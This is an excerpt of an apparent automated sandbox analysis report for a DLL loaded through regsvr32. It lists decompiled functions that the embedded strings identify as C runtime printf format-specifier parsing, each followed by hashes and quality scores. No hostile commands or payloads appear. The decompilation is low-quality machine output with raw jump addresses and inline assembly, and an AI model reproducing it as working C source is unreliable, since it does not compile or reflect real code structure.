                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}




                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                      • API String ID: 530996419-4206863317
                                                      • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                      • Instruction ID: 52af39986bd237b596cdecada1f5af7c0900048515ebe490badd59f4da94dd67
                                                      • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                      • Instruction Fuzzy Hash: 35910A62A0C6C18AE7F08B55E88077EB3E1F385756F600026E6CD87AA4DB7ED855DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D3BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                      				void* _t171;
                                                      				char* _t191;
                                                      				char* _t192;
                                                      
                                                      				_a968 = _a696 & 0x000000ff;
                                                      				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                      				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                      				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                      				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                      				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000001;
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000002;
                                                      				goto 0xf9d3bd7d;
                                                      				asm("bts eax, 0x7");
                                                      				goto 0xf9d3bd7d;
                                                      				_a80 = _a80 | 0x00000008;
                                                      				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                      				_t191 =  &_a1112;
                                                      				_a88 = E000007FE7FEF9D31E40(_t191);
                                                      				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3bdd5;
                                                      				_a88 = _t171 + _t191 - 0x30;
                                                      				_a116 = 0;
                                                      				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                      				_t192 =  &_a1112;
                                                      				_a116 = E000007FE7FEF9D31E40(_t192);
                                                      				if (_a116 >= 0) goto 0xf9d3be14;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3be2d;
                                                      				_a116 = _t171 + _t192 - 0x30;
                                                      				_a972 = _a696 & 0x000000ff;
                                                      				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                      				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                      				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                      				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                      				goto 0xf9d3bfd9;
                                                      				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                      				_a1096 = _a1096 + 1;
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3beb2;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xf");
                                                      				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                      				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                      				goto 0xf9d3bfbe;
                                                      				_a704 = 0;
                                                      				goto E000007FE7FEF9D3BB66;
                                                      				goto 0xf9d3bfd9;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xb");
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}







                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 530996419-4087627031
                                                      • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                      • Instruction ID: f671f2f81670ff54d1d55a26610e2e3881df7bf560f190d6bc7d2e9ce8938301
                                                      • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                      • Instruction Fuzzy Hash: 8B517E72A0D6C28AF3F18B64E855BBEB7E4F384345F600126D2C9869A9DB7DE540CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D3DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                      				void* _t171;
                                                      				char* _t191;
                                                      				char* _t192;
                                                      
                                                      				_a1404 = _a1208 & 0x0000ffff;
                                                      				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                      				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                      				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                      				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                      				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000001;
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000002;
                                                      				goto 0xf9d3dd2b;
                                                      				asm("bts eax, 0x7");
                                                      				goto 0xf9d3dd2b;
                                                      				_a80 = _a80 | 0x00000008;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                      				_t191 =  &_a1560;
                                                      				_a88 = E000007FE7FEF9D31E40(_t191);
                                                      				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3dd83;
                                                      				_a88 = _t171 + _t191 - 0x30;
                                                      				_a116 = 0;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                      				_t192 =  &_a1560;
                                                      				_a116 = E000007FE7FEF9D31E40(_t192);
                                                      				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3dddb;
                                                      				_a116 = _t171 + _t192 - 0x30;
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}







                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 530996419-1247675978
                                                      • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                      • Instruction ID: decea58dbdbd6501be5c610137b77bb3c0dc28cbce38a3a9de9bceb14a18b164
                                                      • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                      • Instruction Fuzzy Hash: 1F510CB2A0C6C68AE7B09B64F8407BEB7E0F385346F600125D6C9869A8D77DE444DF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 26%
                                                      			E000007FE7FEF9D3BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                      				void* _t139;
                                                      				char* _t159;
                                                      				char* _t160;
                                                      
                                                      				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                      				_t159 =  &_a1112;
                                                      				_a88 = E000007FE7FEF9D31E40(_t159);
                                                      				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3bdd5;
                                                      				_a88 = _t139 + _t159 - 0x30;
                                                      				_a116 = 0;
                                                      				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                      				_t160 =  &_a1112;
                                                      				_a116 = E000007FE7FEF9D31E40(_t160);
                                                      				if (_a116 >= 0) goto 0xf9d3be14;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3be2d;
                                                      				_a116 = _t139 + _t160 - 0x30;
                                                      				_a972 = _a696 & 0x000000ff;
                                                      				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                      				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                      				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                      				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                      				goto 0xf9d3bfd9;
                                                      				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                      				_a1096 = _a1096 + 1;
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3beb2;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xf");
                                                      				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                      				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                      				goto 0xf9d3bfbe;
                                                      				_a704 = 0;
                                                      				goto E000007FE7FEF9D3BB66;
                                                      				goto 0xf9d3bfd9;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xb");
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}







                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-192189897
                                                      • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                      • Instruction ID: 7af9cebcf9cdbe51cb5c05a1613d0acac690945035c75598d7829d850d960732
                                                      • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                      • Instruction Fuzzy Hash: 40515E72A0D6C68AE7F0DB24E8947BEBBE4E384355F600126D2CD869A9DB7DD540CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 26%
                                                      			E000007FE7FEF9D3DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                      				void* _t139;
                                                      				char* _t159;
                                                      				char* _t160;
                                                      
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                      				_t159 =  &_a1560;
                                                      				_a88 = E000007FE7FEF9D31E40(_t159);
                                                      				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                      				_a80 = _a80 | 0x00000004;
                                                      				_a88 =  ~_a88;
                                                      				goto 0xf9d3dd83;
                                                      				_a88 = _t139 + _t159 - 0x30;
                                                      				_a116 = 0;
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                      				_t160 =  &_a1560;
                                                      				_a116 = E000007FE7FEF9D31E40(_t160);
                                                      				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3dddb;
                                                      				_a116 = _t139 + _t160 - 0x30;
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                      				goto 0xf9d3df6d;
                                                      				_a1216 = 0;
                                                      				goto E000007FE7FEF9D3DC41;
                                                      				goto 0xf9d3df88;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xb");
                                                      				_a1412 = _a1208 & 0x0000ffff;
                                                      				_a1412 = _a1412 - 0x41;
                                                      				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                      				goto __rax;
                                                      			}







                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-734865713
                                                      • Opcode ID: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                      • Instruction ID: f5bf503dfe25a3916c99f1d9d67644448d63221e22ccd8ab12d6653ca93a9968
                                                      • Opcode Fuzzy Hash: 73e6b479e683be5ecb6b5fbd55da46f8fdb801a5518f0397c70b55b6842a44e9
                                                      • Instruction Fuzzy Hash: 0E510DB2A0C6C28AE7F09B64E8407BEB7E4F394345F600126E6C9879A9DB7DD445CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3BDE7(signed int _a80, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                      				void* _t113;
                                                      				char* _t133;
                                                      
                                                      				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                      				_t133 =  &_a1112;
                                                      				_a116 = E000007FE7FEF9D31E40(_t133);
                                                      				if (_a116 >= 0) goto 0xf9d3be14;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3be2d;
                                                      				_a116 = _t113 + _t133 - 0x30;
                                                      				_a972 = _a696 & 0x000000ff;
                                                      				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                      				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                      				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                      				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                      				goto 0xf9d3bfd9;
                                                      				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                      				_a1096 = _a1096 + 1;
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3beb2;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xf");
                                                      				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                      				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                      				_a1096 = _a1096 + 2;
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3bfbe;
                                                      				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                      				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                      				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                      				goto 0xf9d3bfbe;
                                                      				_a704 = 0;
                                                      				goto E000007FE7FEF9D3BB66;
                                                      				goto 0xf9d3bfd9;
                                                      				_a80 = _a80 | 0x00000020;
                                                      				goto 0xf9d3bfd9;
                                                      				asm("bts eax, 0xb");
                                                      				_a976 = _a696;
                                                      				_a976 = _a976 - 0x41;
                                                      				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                      				goto __rax;
                                                      			}






                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-192189897
                                                      • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                      • Instruction ID: 7a8513096c3cb2bd444751f94b1f2e61cedcdb1a9580f93edff9428065c01d53
                                                      • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                      • Instruction Fuzzy Hash: 0C415B72A0DAC28AE7F0DB24E8947BEB7E4E384745F600126D6DD869A9DB3DD541CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                      				void* _t113;
                                                      				char* _t133;
                                                      
                                                      				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                      				_t133 =  &_a1560;
                                                      				_a116 = E000007FE7FEF9D31E40(_t133);
                                                      				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                      				_a116 = 0xffffffff;
                                                      				goto 0xf9d3dddb;
                                                      				_a116 = _t113 + _t133 - 0x30;
                                                      				_a1408 = _a1208 & 0x0000ffff;
                                                      				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                      				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                      				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                      				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                      				goto 0xf9d3df88;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                      				_a1544 =  &(_a1544[1]);
                                                      				asm("bts eax, 0xc");
                                                      				goto 0xf9d3de61;
                                                      				_a80 = _a80 | 0x00000010;
                                                      				goto 0xf9d3df88;
                                                      				asm("bts eax, 0xf");
                                                      				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("bts eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                      				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                      				_a1544 =  &(_a1544[2]);
                                                      				asm("btr eax, 0xf");
                                                      				goto 0xf9d3df6d;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                      				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
